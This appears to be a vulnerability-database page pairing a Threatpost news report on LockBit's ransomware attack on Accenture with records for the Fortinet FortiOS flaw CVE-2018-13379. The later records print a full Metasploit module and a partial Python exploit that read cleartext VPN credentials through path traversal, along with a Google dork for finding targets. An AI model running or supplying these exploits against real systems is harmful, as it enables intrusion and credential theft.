DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Accenture Confirms LockBit Ransomware Attack", "description": "081321 08:42 UPDATE: Accenture reportedly acknowledged in an internal memo that attackers stole client information and work materials in a July 30 \u201csecurity incident.\u201d\n\n[CyberScoop](<https://www.cyberscoop.com/accenture-ransomware-lockbit/>) reports that the memo downplays the impact of the ransomware attack. The outlet quoted Accenture\u2019s internal memo: \u201cWhile the perpetrators were able to acquire certain documents that reference a small number of clients and certain work materials we had prepared for clients, none of the information is of a highly sensitive nature,\u201d it reads. Threatpost has asked Accenture to comment on CyberScoop\u2019s report.\n\nEarlier this week, the LockBit ransomware-as-a-service (RaaS) gang published the name and logo of what has now been confirmed as one of its latest victims: Accenture, a global business consulting firm with an insider track on some of the world\u2019s biggest, most powerful companies.\n\nAccenture\u2019s clients include 91 of the Fortune Global 100 and more than three-quarters of the Fortune Global 500. According to its [2020 annual report;](<https://www.accenture.com/us-en/about/company/annual-report>) that includes e-commerce giant Alibaba, Cisco and Google. Valued at $44.3 billion, Accenture is one of the world\u2019s largest tech consultancy firms, and employs around 569,000 people across 50 countries.\n\nIn a post on its Dark Web site, LockBit offered up Accenture databases for sale, along with a requisite jab at what the gang deemed to be Accenture\u2019s pathetic security.\n\n> \u201cThese people are beyond privacy and security. I really hope that their services are better than what I saw as an insider. If you are interested in buying some databases, reach us.\u201d \n\u2014LockBit site post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11162046/LockBit-site-screengrab.png>)\n\nLockBit dark-web site screen capture. Source: Cybereason.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to [Security Affairs](<https://securityaffairs.co/wordpress/121048/data-breach/accenture-lockbit-2-0-ransomware-attack.html?utm_source=rss&utm_medium=rss&utm_campaign=accenture-lockbit-2-0-ransomware-attack>), at the end of a ransom payment clock\u2019s countdown, a leak site showed a folder named W1 that contained a collection of PDF documents allegedly stolen from the company. LockBit operators claimed to have gained access to Accenture\u2019s network and were preparing to leak files stolen from Accenture\u2019s servers at 17:30:00 GMT.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11174155/countdown-clock-e1628718131517.png>)\n\nLockBit countdown clock. Source: Cyble.\n\nThe news hit the headlines late Wednesday morning Eastern Time, after CNBC reporter Eamon Javers [tweeted](<https://twitter.com/EamonJavers/status/1425476619934838785>) about the gang\u2019s claim that it would be releasing data within coming hours and that it was offering to sell insider Accenture information to interested parties.\n\n> A hacker group using Lockbit Ransomware says they have hacked the consulting firm Accenture and will release data in several hours, CNBC has learned. They are also offering to sell insider Accenture information to interested parties.\n> \n> \u2014 Eamon Javers (@EamonJavers) [August 11, 2021](<https://twitter.com/EamonJavers/status/1425476619934838785?ref_src=twsrc%5Etfw>)\n\n## Blessed Be the Backups\n\nYes, we were hit, but we\u2019re A-OK now, Accenture confirmed: \u201cThrough our security controls and protocols, we identified irregular activity in one of our environments. We immediately contained the matter and isolated the affected servers,\u201d it said in a statement. \u201cWe fully restored our affected systems from backup, and there was no impact on Accenture\u2019s operations, or on our clients\u2019 systems.\u201d\n\nAccording to [BleepingComputer](<https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/>), the group that threatened to publish Accenture\u2019s data \u2013 allegedly stolen during a recent cyberattack \u2013 is known as LockBit 2.0.\n\nAs explained by Cybereason\u2019s Tony Bradley in a Wednesday [post](<https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware>), the LockBit gang is similar to its ransomware-as-a-service (RaaS) brethren DarkSide and REvil: Like those other operations. LockBit uses an affiliate model to rent out its ransomware platform, taking a cut of any ransom payments that result.\n\nBradley noted that the LockBit gang is apparently on a hiring spree in the wake of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [REvil](<https://threatpost.com/whats-next-revil-victims/167926/>) both shutting down operations.\n\n\u201cThe wallpaper displayed on compromised systems now includes text inviting insiders to help compromise systems \u2013 promising payouts of millions of dollars,\u201d Bradley wrote.\n\n## Insider Job?\n\nCyble researchers suggested in a [Tweet stream](<https://twitter.com/AuCyble/status/1425422006690881541>) that this could be an insider job. \u201cWe know #LockBit #threatactor has been hiring corporate employees to gain access to their targets\u2019 networks,\u201d the firm tweeted, along with a clock counting down how much time was left for Accenture to cough up the ransom.\n\n> Potential insider job? We know [#LockBit](<https://twitter.com/hashtag/LockBit?src=hash&ref_src=twsrc%5Etfw>) [#threatactor](<https://twitter.com/hashtag/threatactor?src=hash&ref_src=twsrc%5Etfw>) has been hiring corporate employees to gain access to their targets' networks.[#ransomware](<https://twitter.com/hashtag/ransomware?src=hash&ref_src=twsrc%5Etfw>) [#cyber](<https://twitter.com/hashtag/cyber?src=hash&ref_src=twsrc%5Etfw>) [#cybersecurity](<https://twitter.com/hashtag/cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) [#accenture](<https://twitter.com/hashtag/accenture?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/ZierqRVIjj](<https://t.co/ZierqRVIjj>)\n> \n> \u2014 Cyble (@AuCyble) [August 11, 2021](<https://twitter.com/AuCyble/status/1425391442248097792?ref_src=twsrc%5Etfw>)\n\nCyble said that LockBit claimed to have made off with databases of more than 6TB and that it demanded $50 million as ransom. The threat actors themselves alleged that this was an insider job, \u201cby someone who is still employed there,\u201d though Cyble called that \u201cunlikely.\u201d\n\nSources familiar with the attack told BleepingComputer that Accenture confirmed the ransomware attack to at least one computer telephony integration (CTI) vendor and that it\u2019s in the process of notifying more customers. According to a [tweet](<https://twitter.com/HRock/status/1425447533598453760?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1425447533598453760%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Faccenture-confirms-hack-after-lockbit-ransomware-data-leak-threats%2F>) from threat intelligence firm Hudson Rock, the attack compromised 2,500 computers used by employees and partners, leading the firm to suggest that \u201cthis information was certainly used by threat actors.\u201d\n\nIn a [security alert ](<https://www.cyber.gov.au/acsc/view-all-content/alerts/lockbit-20-ransomware-incidents-australia>)issued last week, the Australian Cyber Security Centre (ACSC) warned that LockBit 2.0 ransomware attacks against Australian organizations had started to rise last month, and that they were coupled with threats to publish data in what\u2019s known as [double-extortion attacks](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\n\u201cThis activity has occurred across multiple industry sectors,\u201d according to the alert. \u201cVictims have received demands for ransom payments. In addition to the encryption of data, victims have received threats that data stolen during the incidents will be published.\u201d\n\nThe ACSC noted ([PDF](<https://www.cyber.gov.au/sites/default/files/2021-08/2021-006%20ACSC%20Ransomware%20Profile%20-%20Lockbit%202.0.pdf>)) that it\u2019s recently observed LockBit threat actors actively exploiting existing vulnerabilities in the Fortinet FortiOS and FortiProxy products, identified as CVE-2018-13379, in order to gain initial access to specific victim networks. That vulnerability, a path-traversal flaw in the SSL VPN, has been exploited in multiple attacks over the years:\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that advanced persistent threat (APT) nation-state actors were actively exploiting it to gain a foothold within networks before moving laterally and carrying out recon, for example.\n\n## Known Vulnerability Exploited?\n\nRon Bradley, vice president of third-party risk-management firm Shared Assessments, told Threatpost on Wednesday that the Accenture incident is \u201ca prime example of the difference between business resiliency and business continuity. Business resiliency is like being in a boxing match, you take a body blow but can continue the fight. Business continuity comes into play when operations have ceased or severely impaired and you have to make major efforts to recover.\n\n\u201cThis particular example with Accenture is interesting in the fact that it was a known/published vulnerability,\u201d Bradley continued. It highlights the importance of making sure systems are properly patched in a timely manner. The ability for Accenture to manage the repercussions of potentially stolen data will be an important lesson for many organizations going forward.\u201d\n\nHitesh Sheth, president and CEO at the cybersecurity firm Vectra, said that all businesses should expect attacks like this, but particularly a global consultancy firm with links to so many companies.\n\n\u201cFirst reports suggest Accenture had data backup protocols in place and moved quickly to isolate affected servers,\u201d he told Threatpost on Wednesday. \u201cIt\u2019s too soon for an outside observer to assess damage. However, this is yet another reminder to businesses to scrutinize security standards at their vendors, partners, and providers. Every enterprise should expect attacks like this \u2013 perhaps especially a global consulting firm with links to so many other companies. It\u2019s how you anticipate, plan for and recover from attacks that counts.\u201d\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "published": "2021-08-11T21:56:00", "modified": "2021-08-11T21:56:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/accenture-lockbit-ransomware-attack/168594/", "reporter": "Lisa Vaas", "references": ["https://www.cyberscoop.com/accenture-ransomware-lockbit/", "https://www.accenture.com/us-en/about/company/annual-report", "https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11162046/LockBit-site-screengrab.png", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://securityaffairs.co/wordpress/121048/data-breach/accenture-lockbit-2-0-ransomware-attack.html?utm_source=rss&utm_medium=rss&utm_campaign=accenture-lockbit-2-0-ransomware-attack", "https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11174155/countdown-clock-e1628718131517.png", "https://twitter.com/EamonJavers/status/1425476619934838785", "https://twitter.com/EamonJavers/status/1425476619934838785?ref_src=twsrc%5Etfw", "https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/", "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware", "https://threatpost.com/darksides-servers-shutdown/166187/", "https://threatpost.com/whats-next-revil-victims/167926/", "https://twitter.com/AuCyble/status/1425422006690881541", "https://twitter.com/hashtag/LockBit?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/threatactor?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/ransomware?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/cyber?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/cybersecurity?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/accenture?src=hash&ref_src=twsrc%5Etfw", "https://t.co/ZierqRVIjj", "https://twitter.com/AuCyble/status/1425391442248097792?ref_src=twsrc%5Etfw", "https://twitter.com/HRock/status/1425447533598453760?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1425447533598453760%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Faccenture-confirms-hack-after-lockbit-ransomware-data-leak-threats%2F", "https://www.cyber.gov.au/acsc/view-all-content/alerts/lockbit-20-ransomware-incidents-australia", "https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/", "https://www.cyber.gov.au/sites/default/files/2021-08/2021-006%20ACSC%20Ransomware%20Profile%20-%20Lockbit%202.0.pdf", "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar"], "cvelist": ["CVE-2018-13379"], "immutableFields": [], "lastseen": "2021-08-13T13:06:12", "viewCount": 753, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187"]}, {"type": "cisa", "idList": ["CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-13379"]}, {"type": "cve", "idList": ["CVE-2018-13379"]}, {"type": "dsquare", "idList": ["E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:47287", "EDB-ID:47288"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-20-233"]}, {"type": "hivepro", "idList": ["HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "ics", "idList": ["AA20-283A", "AA20-296A", "AA21-209A", "AA21-321A", "AA22-011A", "AA22-047A", "AA22-117A", "AA22-257A"]}, {"type": "kitploit", "idList": ["KITPLOIT:119877528847056004", "KITPLOIT:1244156083583318186", "KITPLOIT:2686676167278919598", "KITPLOIT:2722328714476257207", "KITPLOIT:3532211766929466258", "KITPLOIT:4425790137948714912", "KITPLOIT:5376485594298165648", "KITPLOIT:5397133847150975825", "KITPLOIT:5563730483162396602", "KITPLOIT:5829195600312197311", "KITPLOIT:6516544912632048506", "KITPLOIT:7070039119688478663", "KITPLOIT:763105754466120590", "KITPLOIT:816704453339226193", "KITPLOIT:965198862441671998"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5"]}, {"type": "mmpc", "idList": ["MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "mssecure", "idList": ["MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "nessus", "idList": ["FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "securelist", "idList": ["SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6"]}, {"type": "thn", "idList": ["THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3474CD6C25ADD60FF37EDC1774311111", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:63560DA43FB5804E3B258BC62E210EC4", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:8BA951AD00E17C72D6321234DBF80D19", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:F25FAD25E15EBBE4934883ABF480294D", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134"]}]}, "score": {"value": -0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187"]}, {"type": "cisa", "idList": ["CISA:17ECE93409F2BF9846D576277DA8717C", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:452D43AC6599B76DF22B4805470283C8", "CISA:8FAFD5A4573898E60D59E0AE79D28E99", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cve", "idList": ["CVE-2018-13379"]}, {"type": "dsquare", "idList": ["E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:47287", "EDB-ID:47288"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-20-233"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:119877528847056004", "KITPLOIT:1244156083583318186", "KITPLOIT:2686676167278919598", "KITPLOIT:2722328714476257207", "KITPLOIT:3532211766929466258", "KITPLOIT:4425790137948714912", "KITPLOIT:5376485594298165648", "KITPLOIT:5397133847150975825", "KITPLOIT:5563730483162396602", "KITPLOIT:5829195600312197311", "KITPLOIT:6516544912632048506", "KITPLOIT:7070039119688478663", "KITPLOIT:763105754466120590", "KITPLOIT:816704453339226193", "KITPLOIT:965198862441671998"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:80B21E934B1C43C7071F039FE9512208"]}, {"type": "mmpc", "idList": ["MMPC:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "mssecure", "idList": ["MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "nessus", "idList": ["FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "securelist", "idList": ["SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6"]}, {"type": "thn", "idList": ["THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:F25FAD25E15EBBE4934883ABF480294D", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:FBDAEC0555EDC3089DC0966D121E0BCE"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:BF445076196AE435921E0B3C4AA3CE5C"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-13379", "epss": "0.974950000", "percentile": "0.999520000", "modified": "2023-03-17"}], "vulnersScore": -0.5}, "_state": {"dependencies": 1678920471, "score": 1678921101, "epss": 1679109163}, "_internal": {"score_hash": "4d6db9bb77f4c6cd1cf792e43a316caa"}}

{"checkpoint_advisories": [{"lastseen": "2021-12-17T11:30:11", "description": "A directory traversal vulnerability exists in Fortinet FortiOS. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-17T00:00:00", "type": "checkpoint_advisories", "title": "Fortinet FortiOS SSL VPN Directory Traversal (CVE-2018-13379)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-10-28T00:00:00", "id": "CPAI-2018-1187", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2019-08-20T21:46:14", "description": "", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "packetstorm", "title": "FortiOS 5.6.7 / 6.0.4 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "PACKETSTORM:154146", "href": "https://packetstormsecurity.com/files/154146/FortiOS-5.6.7-6.0.4-Credential-Disclosure.html", "sourceData": "`# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. \n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\" \n# Date: 17/08/2019 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.fortinet.com/ \n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html \n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n# Tested on: 5.6.6 \n# CVE : CVE-2018-13379 \n \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SSL VPN FortiOs - System file leak', \n'Description' => %q{ \nFortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. \nThis exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). \nThis vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ] \n], \n'Author' => [ 'lynx (Carlos Vieira)' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing binary file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ow crap, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/154146/fortios-disclose.rb.txt"}, {"lastseen": "2019-08-20T21:46:13", "description": "", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "packetstorm", "title": "FortiOS 5.6.7 / 6.0.4 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "PACKETSTORM:154147", "href": "https://packetstormsecurity.com/files/154147/FortiOS-5.6.7-6.0.4-Credential-Disclosure.html", "sourceData": "`# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. \n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\" \n# Date: 17/08/2019 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.fortinet.com/ \n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html \n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n# Tested on: 5.6.6 \n# CVE : CVE-2018-13379 \n \n# Exploit SSLVPN Fortinet - FortiOs \n#!/usr/bin/env python \nimport requests, sys, time \nimport urllib3 \nurllib3.disable_warnings() \n \n \ndef leak(host, port): \nprint(\"[!] Leak information...\") \ntry: \nurl = \"https://\"+host+\":\"+port+\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\" \nheaders = {\"User-Agent\": \"Mozilla/5.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"} \nr=requests.get(url, headers=headers, verify=False, stream=True) \nimg=r.raw.read() \nif \"var fgt_lang =\" in str(img): \nwith open(\"sslvpn_websession_\"+host+\".dat\", 'w') as f: \nf.write(img) \nprint(\"[>] Save to file ....\") \nparse(host) \nprint(\"\\n\") \nreturn True \nelse: \nreturn False \nexcept requests.exceptions.ConnectionError: \nreturn False \ndef is_character_printable(s): \nreturn all((ord(c) < 127) and (ord(c) >= 32) for c in s) \n \ndef is_printable(byte): \nif is_character_printable(byte): \nreturn byte \nelse: \nreturn '.' \n \ndef read_bytes(host, chunksize=8192): \nprint(\"[>] Read bytes from > \" + \"sslvpn_websession\"+host+\".dat\") \nwith open(\"sslvpn_websession_\"+host+\".dat\", \"rb\") as f: \nwhile True: \nchunk = f.read(chunksize) \nif chunk: \nfor b in 